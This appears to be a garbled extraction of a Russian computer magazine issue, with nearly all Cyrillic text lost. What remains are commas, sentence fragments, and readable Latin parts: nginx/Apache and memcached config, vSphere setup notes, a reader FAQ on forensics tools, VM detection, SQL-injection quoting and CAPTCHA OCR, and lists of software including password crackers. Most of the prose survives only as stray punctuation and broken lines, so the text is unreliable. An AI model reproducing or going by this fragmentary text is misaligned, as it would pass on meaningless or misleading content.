# vi /etc/nginx/sites-enabled/host.com
server {
    listen 80;
    server_name host.com;
    access_log /var/log/nginx.access_log;
    # static files are served by Nginx itself
    location ~* \.(jpg|jpeg|gif|png|css|js|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|tar|wav|bmp|rtf|swf|ico|flv|txt|xml|docx|xlsx)$ {
        root /var/www/host.com/;
        index index.html index.php;
        access_log off;
        expires 30d;
    }
    # never serve .htaccess files
    location ~ /\.ht {
        deny all;
    }
    # everything else is proxied to Apache on port 81
    location / {
        proxy_pass http://127.0.0.1:81/;
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $remote_addr;
        proxy_set_header Host $host;
        proxy_connect_timeout 60;
        proxy_send_timeout 90;
        proxy_read_timeout 90;
        proxy_redirect off;
        proxy_set_header Connection close;
        proxy_pass_header Content-Type;
        proxy_pass_header Content-Disposition;
        proxy_pass_header Content-Length;
    }
}

, Apache Nginx:
$ sudo service apache2 restart
$ sudo service nginx restart

MEMCACHED
Memcached
, .

- , API. memcached
, , ,
, . -
PHP-,
( ) memcached,
- ( , nginx),

memcached. memcached
- ,
.
:
1. memcached:
$ sudo apt-get install memcached

2. server nginx
:
# vi /etc/nginx/nginx.conf
location / {
    # the memcached key is the request URI (no query string)
    set $memcached_key $uri;
    # memcached address
    memcached_pass 127.0.0.1:11211;
    # cached pages are HTML
    default_type text/html;
    # cache miss: hand the request to the backend
    error_page 404 = /fallback;
}
location /fallback {
    # "backend" is an upstream block pointing at Apache (port 81 above)
    proxy_pass http://backend;
}

3. PHP memcache (
memcached):
$ sudo pecl install memcache

4. :
$ vi sample.php
<?php
// connect to memcached through the memcache PECL extension
$memcache = new Memcache;
$memcache->connect('127.0.0.1', 11211);
ob_start();
// ... the page is generated here ...
$html = ob_get_clean();
// key must match nginx's $memcached_key, i.e. the path without the query string
$memcache->set(parse_url($_SERVER['REQUEST_URI'], PHP_URL_PATH), $html);
echo $html;

, ,
-. ,
. , , .
. .

SSI (Server Side Includes). SSI -
, -
. , SSI,
- :
# vi /var/www/index.php
<html>
<body>
<!--# include virtual="/auth.php" -->
<!--# include virtual="/body.php" -->
</body>
</html>

memcached

memcached '-L'.

.
memcached

.

,
auth.php, body.php.
,
. :
1. .
- nginx.
2. nginx index.php - (Apache), SSI- *2* -
(auth.php body.php).
3. , Apache PHP-
, ( ) body.php memcached.
4. nginx, index.
php .
5. , index.php - (, ,
nginx), Apache
auth.php, body.php memcached.
, SSI nginx ssi on,
location /. , auth.php ,
,
memcached.


-,
. ,
:
1. gzip deflate .
HTTP-: ngx_http_gzip_module
nginx, mod_compress lighttpd mod_deflate Apache.
2.
HTML JavaScript ( ,
.., , web-optimizator,
code.google.com/p/web-optimizator).
3. CSS JavaScript- ,
(
,
).
4. CSS , JavaScript .
5. Expires Cache-control,
CSS JavaScript .
6. JPG PNG , GIF (,
).z


SYN/ACK
grinder grinder@synack.ru

VMWARE VSPHERE

. - . , ,
VMware .
, : Microsoft, Oracle
Corporation, Parallels, VMware . ,
,
, - . ,
(SaaS, Software as a
service, ), ,
. VMware vSphere.

VSPHERE
VMware vSphere (www.vmware.com/products/
vsphere) , 2009 .
,
VMware Virtual Infrastructure,
. vSphere , ,
,
.
. . Google, Microsoft Azure Amazon,
, . vSphere

,
. ,
VMware,
.
,
:
VMware vStorage Thin Provisioning ; ;
VMware VMsafe ,
;
VMware API vStorage vCenter Data Recovery
VM ;
VMware Hot Add
;
VMware Distributed Power Management , ;
VMware Host Profiles , -


VMware ESX/ESXi . vNetwork,


,
VMware VMotion,
High Availability Fault Tolerance,
VMware DRS,
Storage VMotion. vSphere ,
(, )
(, Veeam Backup, www.veeam.com). CPU, RAM
(Resource Pool), (Reservation). , VMware,
VMware Compatibility Guide, Windows *nix. vSphere, Virtual
Infrastructure, ,
, (
); CPU.
6 ( Advanced Enterprise
Plus 12), .
, .
VMware vSphere :
VMware ESX / VMware ESXi (
);
VMware vCenter Server Agent, VMware vCenter Server ( VMware
VirtualCenter Server);
vCenter Server, , ( );
, ,
.
VMware
vSphere 4 update 2, .

VSPHERE
, ,
.

VM .

vSphere,
:
VMware
Hardware Compatibility List;
VMware vSphere ESX/ESXi Server
(22 64 bit CPU, 2+ RAM, 2+
HDD);
VMware vCenter Server vSphere Client
ESX(i)-;
SAN;
.
,
( , SAN,
Active Directory ).
,
www.vmware.com/support/
pubs/vs_pubs.html.
vSphere, , . ,
,
ESX VMware ESXi, VMware vCenter Server (
ISO- zip-). : Server Heartbeat, Data Recovery (CD ISO)
vShield Zones. , ,
VMware ESXi, .
VMware ESX ESXi, , Linux ( ),
, .
: ,
.
, - vSphere Client. - ,
ESX(i) vCenter.
VMware vCenter
Windows.
, XP,
2k8R2. vCenter ,
(5 , 50 )

Microsoft SQL Server 2005 Express,



.
. (
250), 32- . :

32- XP SQL Express,
64-
SQL-. ISO- zip-,

vCenter Server. , : vSphere Client, vCenter
Guided Consolidation, vCenter Update Manager, vCenter
Converter, vCenter Orchestrator VMware Consolidated
Backup. .

, , . , vCenter
-,
IIS . ,
: http,
https, LDAP, SSL, heartbeat. , , (.Net, J# .)
. vCenter
(Linked Mode)

. standalone
, vCenter Server Linked
Mode Options Join a VMware
vCenter Server group ...
vCenter. , ,
. ,
,
.
, vCenter Installer, , , . ,
, .
vCenter Update Manager (vCUM)
IP- vCenter .
, ,

HTTP://WWW
links
VMware
vSphere vmware.
com/products/vsphere


vSphere
vmware.com/
support/pubs/vs_pubs.
html.

64- CPU
CPU
Identification,
www.vmware.com/
download/shared_
utilities.html.



VMware ESXi

standalone- vCenter
Server

, , , VMware
Hardware Compatibility List (vmware.com/go/hcl). ,
-: VM Help (vm-help.com/
esx40i/esx40_whitebox_HCL.php), VMware's Communities
List (communities.vmware.com/cshwsw.jspa) Ultimate ESX
Whitebox (ultimatewhitebox.com).

- VMware Go

. :
Database Information , Windows-. ,
, ,
( 20 ).
Destination Folder Configure the location for downloading
patches. vSphere Client, , (
: Pentium II 300, 200 RAM 1 HDD).


. vSphere Client,
( Use Windows session credential

PowerShell

GUI,

. , ,
GUI. VMware
PowerShell PowerCLI (vmware.com/go/powercli).
,
Connect-VIServer, Get-VM Get-VICommand.
PowerShell. , , VMware Project Onyx
(blogs.vmware.com/vipowershell/2009/11/project-onyx-ishere.html), PowerShell-, VMware vSphere Client.
PowerCLI blogs.
vmware.com/vipowershell.


), .
. , , .
. Home Inventory Host and Clusters,
.
vSphere, Home.
:
Inventory , , datacenter,
;
Administration , , , vSphere, ;
Management ,
, .
, .
; - , ,
. -, - , vSphere
. , ,
. , .
,
. ,
. Administration Licensing,
Manage vSphere Licenses. Add License Keys. , Assign Licenses
Change License Key.
ESX(i).
DataCenter, .
DataCenter Add a host.
, IP /
; ,
.
. , . , Summary
. Configuration,

INFO

info

vSphere Client

VM


, ,
.
. TCO/ROI-,
VM,
(TCO Total
Cost of Ownership , ROI Return on investment ).
VMware www.vmware.
com/calculator , , , ,
: , ,
.
:
( VMotion, iSCSI, NFS ), , .

. New Cluster,
. HA (High Availability)
DRS (Distributed Resource Scheduler). ,


.
, VM (Manual, Partially, Full
automated) ( Conservative Aggressive).
(DPM),
, EVC (Enhanced VMotion
Compatibility), -.
, EVC . ,
, , ,
SSE. ,
VMotion
, ? EVC
,
, VM . EVC AMD- Intel-.

. , ,

vSphere
EVC . ,
. :
. ,
, Next .
Deploy
OVF Template, Open Virtualization Format
, (,
,
VMware OVF Tool). .
.
. Migrate
, .
,
,
- . vSphere
,
Administration Roles 9 , .

.


.
Fault Tolerance (VMFT,
, VM), Storage vMotion
(SVMotion, VM
), ,
.
(vmwareelearning.
blip.tv, youtube.com/user/VMwareKB, youtube.com/user/
VMwareELearning). z

vSphere
:
Standard, Advanced
Enterprise.

Essentials
Essentials Plus,


.

()
vNetwork





(
).



vSphere
.
VMware
Go (go.vmware.com)


VMware ESXi

.

vSphere
80,
389, 443, 636, 902/903,
8080 8443.


UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

- ,
: , , , . , , , . , ,
,
, .
, .
?

,
, ;
,
, .
:). ,
, ,
.
, :
. ( :) );
;
( );
- , ;
,
;
. ,
, ,
.
,
.


,
, .
,
, . ,


, ,
,

,

.
, ,
.

.


.
. : ,
,
, . ,
, ;
. ,
,
, . .

( ,
. ,
- -

).
: , ,

.
,
30%
.
( , ):
,
, ,
. -
.
: ,
?.
:
, - -
10- . ,

,
,

.
.
, , -: , ,
. ,
,

: ,
,

,
, :
: ,
?.

,
. : -


, .
, :

, .
.
, ,
.
,
,
,
.
, , .


,
- , , ,

. ;
.
, -;
,
.

-, .
: -, , . -
, 1-2 .
10
.
-, .

. , , ,
, , , - , ,
, ,
.
, . ,
,

,
,
, , . , .
, 3 !
() ?

, ?
?
?
; , , .
?

,
.



, ,
, .
, ,
, .
: ,
, . .
, . , -.
, ,
.

,
.

(
) (
).

(-,
, ).

,
. 5
: 1.

,
.
, , ,
-..., ..
, ,
, ,
,
,
,
,

( , ..) , ,
, .

.
,
,
.
:).



VS
. ? ,
.
, .
, / . , , , , .

,
.
.
, ,
: ,
.
,

,

. ,
100%. ,
,
:
,

, .


, .
.

. .
:
? , ?
, Delphi, ?
, .
,
. : -,
,
,
2 .
, ,
, ?
. ,
.
. ,
, ,
-
.



- : , , , , .
, ,
. , ,

,
. ,
( , );
, .

, ,
, ,
. ,
,

, . ,
- , ,
, , ,
,
,
, .
? ,
, :
. ,
, ?.
,
. ,
.

, -
-, ,

. ,
- , -
, .
(, IT-) ,
, ;
, ,
.
,
,

.
.


, -
, .
,
, ,
,
(
, ),
,
.
,
.


. ,
, , , .
, ;
, .
,
,
,
.
-.
: ,
,
. : ,

, .
, ,

, ,
,
.
: ,
, .

. ,
,
. .

,
, . , ,
.
,

- ,
.
:
, .


, , , .
,
.

,
,
,
(,
):
, , ,
;
,
;
: , , , , ;
,
,
,
;
,
;
,
.
, .

.
:
-
,
.
= , ,
.
, .
,

. ,
, PR-
? ,
. ,
. ,
.
, .
:

, .
? :) ,
. , ,


.


. , , ,
. ! ,

,
.
:
, ;

. ,
, , ;
( )
. ,
;
50- ,
( . !) .

,
.

(
) ,
, :
,
. :
?
:
1. ;
2. ;
3. .
:
1. , , , ?
2. ,
,
. ,

, ?
3.
,
,

, ,

,
,

( ! ?);
(
,

,
, ).
, , .
AOL Internet is a good
thing Internet is a bad thing (
YouTube ) ,
.
. ,
,
, . ,
, -
; .
.
,
;
.
.
- ; , .
, ,

.
-, , , ,
,
.
,
, ,

.

, ,
. ,
; , ,
, ,
, .
, , PR- (
PR, ),
, ,
.
.
. ][
:).z


UNITS
ant

faq
united
@real.xakep.ru

Q:
Windows

ProDiscover (www.techpathways.com/
DesktopDefault.aspx?tabindex=3&tabid=12).

/ egg- (
Python) :

,
.

Q:

Python'?

, , ,

A: , , , ,
setuptools. -
pypi.python.org/pypi/
setuptools.

:
1. setuptools easy_install,

exe.
.
.
2. :
easy_install [ ].
. ,

MAC (Modified, Access, and Change)


.
.
?

A: MFT (
, ),

mac-robber (www.sleuthkit.org).
mac-robber ,
MAC
. The Sleuth Kit
(TSK), .
: MFT, , TSK


easy_install example.com/path/to/MyPackage-1.2.3.tgz

Q: , PDF-
, , ,
.
.

A:
PDF Scanner (blogs.paretologic.
com/malwarediaries/CL_PDF_Scanner.zip).
PDF,
:
1. nothing found ( );
2. potential risk JavaScript code (
JS-, );
3. suspicious file (
, , , ). , ,

malwaredomainlist.
com mdl.paretologic.com.
Q: , Skype - IRC.
?

A: Skype
IRC-. GUI-,
.
:
/add [username]
username .
/leave .
/topic [text] .
/get guidelines
guideline',
/kick [username]
.
/kickban [username] , kick
.
/set /set banlist
, .
/set /get allowlist
,
.
/setrole [username] MASTER | USER |
LISTENER
.
: Skype? CREATOR MASTER . USER
. LISTENER ,
.
Q:
,

HDD



Raphael , . ,
, ,
JavaScript ,
Flash. HTML 5.

Flash-
Silverlight-. ,

Q: PCAP-

JavaScript. ?

A: ,
,
Raphael (raphaeljs.com). W3G
SVG,
Vector Markup Language ( ). ,
, Raphael, DOM-.
JavaScript,
, .

:
// canvas of 320 x 200 placed at (10, 50)
var paper = Raphael(10, 50, 320, 200);
// circle centred at (x, y) = (50, 40) with radius 10
var circle = paper.circle(50, 40, 10);
// fill colour (#f00)
circle.attr("fill", "#f00");

A: , , .
.
,
IP-. , ,
,
nwmap (nwmap.sourceforge.net).
Nmap
Tshark.
Q: : embedded-, . ,
USB-
. - . NTFS, ,
, . , FAT ,
. , ?
A: , FAT/
FAT32.
,
.
HP USB Disk Storage Format Tool PE2USB.

,
Google.
Q: , .
,
( VMware
Workstation) .
.
.
,
?

A: ,
,
LDTR.
,
, . Windows
,
LDTR
. ,
VMware . :
LDTR, , ,

.
SLDT (Store
Local Descriptor Table Register),

ring-3 .
:

SLDT ,
.
Q: : CAPTCHA . ,



,
$fname.
,
SQL Injection.
Interpolique, . :
$conn->query(eval(b('select * from table where fname=^^fname;')));

b -
base64-
, ^^.
:

JavaScript
: l, 1, I. ,
, ?

Q:
: [A-Z][a-z][0-9]
.
, ,
:
,
. ,
,
. :
l, 1, I
;
W, w w v vv;
O,0, Q ,
;
g, 9 , ;
3, 8 B;
4 A;
5 S;
L V;
r n;
h n;
Y, y, v
.
,
.
Q:
CAPTCHA. -,
, ,
OCR, -
,
CAPTCHA?

A: , ,
, OCR-. ,
, ,
.
GOCR (jocr.sourceforge.net) OCR-,


. ,
, .
Tesseract (code.google.com/p/tesseract-ocr)
OCR-,
HP 1985 1995
. , ,
,
, GOCR.
ocropus (code.google.com/p/ocropus)
Tesseract , Google :). ,
, .
Gamera (ldp.library.jhu.edu/projects/gamera)
,
( CAPTCHA),
.
Q: , SQL-.

A: (, )
-.
WAF
][ (www.xakep.ru/magazine/xa/130/056/1.
asp). ,
, SQL-,
Interpolique.
,
DNS. Interpolique
,
, base64 .
?
,
.
,
.
:
$conn->query("select * from table where fname=^^fname;");

select * from table where fname=b64d("Veh.....=")

-
. fname ( , ),
-, , .
www.scribd.com/
doc/33001026/Interpolique. , ,

base64 MySQL.
PostgreSQL base64
encode/decode.
Q: SHSH, iPhone/iPad,
?
?

A: Apple , ,
, . ,
.
, firmware Apple
- , Jailbreak (
). iPhone, iPod Touch
iPad, iTunes
Apple,
ECID (
) .
SHSH

iBoot, .
iBoot , .
SHSH? :
Apple,

( Jailbreak),
,
.
,
SHSH, - Apple. SHSH TinyUmbrella
(thefirmwareumbrella.blogspot.com).z

>Multimedia
Ashampoo Snap 4.0.0
Evernote 3.5.4
Flashcards 2.2.5
Fotobounce 3.0.3
Foxit Reader 4.0
GameSave Manager
Gimp 2.6.9
Google Earth 5.2
Gramps 3.2.3

>Misc
BatteryBar Free 3.4.1
CLCL 1.1.2
Folder Bookmarks 1.6.5.1
gMote 1.41
Launchy 2.5
Listary
OnTopReplica
Piles
Preme 0.92
TimeSheet 1.1.5
TriX 0.0.11.17
USB Stick Watcher 1.5
Windows 7 Shortcuts 0.4.2

>Dailysoft
7-Zip 4.65
DAEMON Tools Lite 4.35.6
Download Master 5.7.2.1217
Far Manager v2.0 build 1420 x86
FileZilla Client 3.3.3
Firefox 3.6.6
foobar2000 1.0.3
K-Lite Mega Codec Pack 6.10
Miranda 0.8.27
Nodepad++ 5.7
Opera 10.60
PuTTY 0.60
Skype 4.2
SysinternalsSuite ()
Total Commander 7.50a
Unlocker 1.8.9
Xakep CD DataSaver 6.0
XnView 1.97.6

>>WINDOWS
>Development
Adobe AIR 2.0
Diffuse 0.4.3
Eclipse 3.6
Enterprise Architect 8.0
Geany 0.19
Mockups For Desktop
Google App Engine SDK for Java
Google App Engine SDK for Python
HttpWatch 7.0
Inno Setup 5.3.10
jQueryPad
LINQPad
MySQL Community Server 5.1.48
MySQL Workbench 5.2.25
NetBeans 6.9
Python 2.7
WebStorm-RC-95.298

>>UNIX
>Desktop
DjVuSmooth 0.2.7
DockbarX 0.39.4
Enlightenment 1.0.2

>System
Acronis Drive Monitor Free
AVG Free Edition 9.0.839
BatteryCare 0.97
Beep Codes Viewer 0.0.1
Cobian Backup 10
DriveImage XML 2.14
FileSeek 1.9.8
HashMyFiles 1.68
HashTab 3.0
Ketarin 1.1
Monitor Asset Manager 2.5
RAMDisk 3.5
Sandboxie 3.46
Security Essentials 1.0.1963
SpyShelter Free
SSD Tweak Utility
UNetbootin 4.71
USB Safeguard 1.3
USB WriteProtector 1.1
VirtualBox 3.2.6
Watch 4 Folder 2.0

>Net
Adobe flash player 10.1
Aria2 1.9.5
CrossFTP 1.65a
EiskaltDC++ 2.0.3
Emesene 1.6.2
Empathy 2.30.2
Google Chrome 5.0.375.86
Googlecl 0.9.8
Googsystray 1.2.0
KDropbox 0.3.0
LimeWire 5.5.10
Mozilla Firefox 3.6.6
Mozilla Thunderbird 3.1
Opera 10.60
qBittorrent 2.2.10
SeaMonkey 2.0.5
Transmission 2.00
Twit Beta
Uget 1.5.9.2
XTelnet 0.4.4

>Games
Wormux 0.9.2

>Devel
Adobe AIR 2.0
Android 2.2
CodeBlocks 10.5
Eclipse 3.6
Geany 0.19
Gnat GPL 2010
Hancock 2.0.2
HSQLDB 2.0
libpng 1.4.3
Meld 1.3.2
MonoDevelop 2.4
MySQL Workbench 5.1.18
NetBeans 6.9
Python 2.7
Paco 2.0.8
Qt Creator 2.0
Ruby Enterprise Edition 1.8.7
Tcl 8.5.8
xTests 0.15.2
ZinjaI 20100624

>Security
AutoIt 3.3.6
BotHunter 1.5.0
EXEForger (SignsImitator) 1.0.40.10
Free Netsparker Community Edition
Hexjector 1.0.7.4
JBroFuzz 2.3
MDD 1.3
PenTBox 1.3.2
Poet 1.0.0
PyLoris 3.0
RainbowCrack 1.41
Sikuli 0.10.1
Snorby Spsa 1.4
Tinc 1.0.13
USBdumper
Wireshark 1.2.9

>Net
Fortitude HTTP 1.0.1.8
Garena
LogMeIn Hamachi
Opera 10.60
Swish 0.4.0
TightVNC 2.0
Trillian 4.2.0
Tunngle 4.3.1.4
VodBurner 1.0.2
Vuze 4.4.0.6a
Weezo 2.1

Flashcards 2.2.5
F-Spot 0.7.0
Furius ISO Mount 0.11.2.1
Gimp 2.6.9
Gnucash 2.2.9
Gramps 3.2.3
Inkscape 0.48
K3b 2.0.0
Kaffeine 1.0
LilyPond 2.13.2
Mathomatic 15.1.4
OpenOffice.org 3.2.1
Pcmanfm 0.9.7
Remind 3.1.9
SimpleBurn 1.5.1
SnowIsh 2
StarDict 3.0.2
VLC 1.1.0

iTunes 9.2
Lotus Symphony 3 Beta
Rainmeter 1.2
Songbird 1.7.3
Zoner Photo Studio Free

>System
EncFS 1.6.0
Linux Kernel 2.6.34
Logstalgia 1.0.0
Pacman 3.4.0
PCSX2 0.9.7 Beta
rdup 1.1.7
SynCE 0.15
Syslinux 3.86
Sysstat 9.1.3
Tracker 0.8.13
VirtualBox 3.2.6
Wine 1.0.1
WineGame 0.1
Zen-kernel 2.6.34

>Server
389 Directory Server 1.2.5
Amavisd-new 2.6.4
Anti-Spam SMTP Proxy Server
1.7.5.5
Apache 2.2.15
BIND 9.7.0
Cherokee 1.0.3
Courier-IMAP 4.8.0
CUPS 1.4.3
DHCP 4.1.1
Dovecot 1.1.12
Mail Avenger 0.8.1
Monkeyd 0.10.3
Music Player Daemon 0.15.9
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Samba 3.5.4
Simon 0.2
TeamSpeak3
Xorg server 1.8.1

>Security
Agentsmith 0.1
ArpON 2.0
AVG Anti-Virus Free Edition 8.5.0812
Beltane 1.0.17
Ctm 0.2.0
Editor shellcode
John the Ripper 1.7.6
Poet 1.0.0
PyLoris 3.0
Samhain 2.7.1
Simplefuzz 0.6.2
Snare 1.5.1
Snort2Pf 4.4
Spiderpig
Suricata 0.9.2
THC-Hydra 5.7
THC-IPv6 1.2
Tinc 1.0.13
Tmac 1.0
Tor 0.2.1.26


UNITS

HTTP:// WWW2


DDoS-

SCREENJELLY

IPINFODB

WWW2
ScreenToaster,
. , 31
. , , , , , Screenjelly. Windows Mac OS X
, .

, IPinfoDB IP-, . ,
, IP.
; ,
.htaccess,

. .

www.screenjelly.com

www.ipinfodb.com

ICONSEARCH

SYNC.IN

,
IconSearch. . , ,
, Google ,
. ,
519 .
133673 . : PNG- , , ,
.

, , - Etherpad, . ,

. Google, , ,
Google Docs Google Wave. ! ,
Etherpad Sync.in.
Create a public note (, sync.in/
mzTvpcoKKA) .

www.iconsearch.ru


www.sync.in
